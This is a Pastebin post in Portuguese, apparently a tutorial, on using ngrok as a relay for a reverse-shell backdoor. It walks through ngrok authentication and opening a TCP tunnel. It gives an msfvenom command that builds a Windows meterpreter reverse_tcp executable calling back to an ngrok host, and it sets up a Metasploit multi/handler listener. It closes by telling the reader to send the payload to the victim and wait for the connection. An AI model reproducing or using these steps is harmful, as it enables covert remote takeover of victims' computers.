Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1) Fazendo o download.
- - Acesse o link de download e escolha a opção mais adequada para você
- https://ngrok.com/download
- 2) Registrando e autenticando
- - Crie sua conta do ngrok aqui, apenas coloque seu email, um usuário e uma senha.
- - Após registrar sua conta você recebera um código de autenticação, você pode ver seu codigo aqui.
- https://dashboard.ngrok.com/auth
- - Após ter baixado o ngrok digite o comando:
- ./ngrok authtoken <seu-codigo-de-autenticacao>
- - O programa estará pronto para uso
- 3) Usando ngrok para conexão reversa:
- - Para usar em uma backdoor por exemplo você utilizara uma conexão tcp:
- ./ngrok tcp 1337
- http://prntscr.com/j5ezrr
- - A conexão foi estabelecida agora vamos criar a backdoor:
- * O LHOST será este ip:
- https://prnt.sc/j5f04q
- * E o LPORT para cada usuário sera diferente EX:
- http://prntscr.com/j5f0hl
- * Agora é so rodar o msfvenom com o ip e porta (obs: coloquei o payload para windows mais vc pode usar o de sua preferência )
- ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=porta-do-ngrok -f exe > backdoor
- http://prntscr.com/j5f0va
- 4) Escutando a conexão:
- - Após a backdoor ser criada vamos iniciar o handler:
- * IMPORTANTE: para escutar a conexão a porta e o host serão DIFERENTES do payload;
- A porta será a que você colocou no inicio no ngrok, no meu caso 1337
- O host sempre será 127.0.0.1 ou 0.0.0.0 ou localhost, de qualquer jeito será seu ip LOCAL.
- https://prnt.sc/j5f231
- https://prnt.sc/j5f1yp
- - Configurado o handler basta escutar a conexão com
- msf exploit(multi/handler) > run
- ou
- msf exploit(multi/handler) > exploit
- - Depois de enviado o payload para a vítima é so esperar a conexão!
- https://prnt.sc/j5f2s6
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement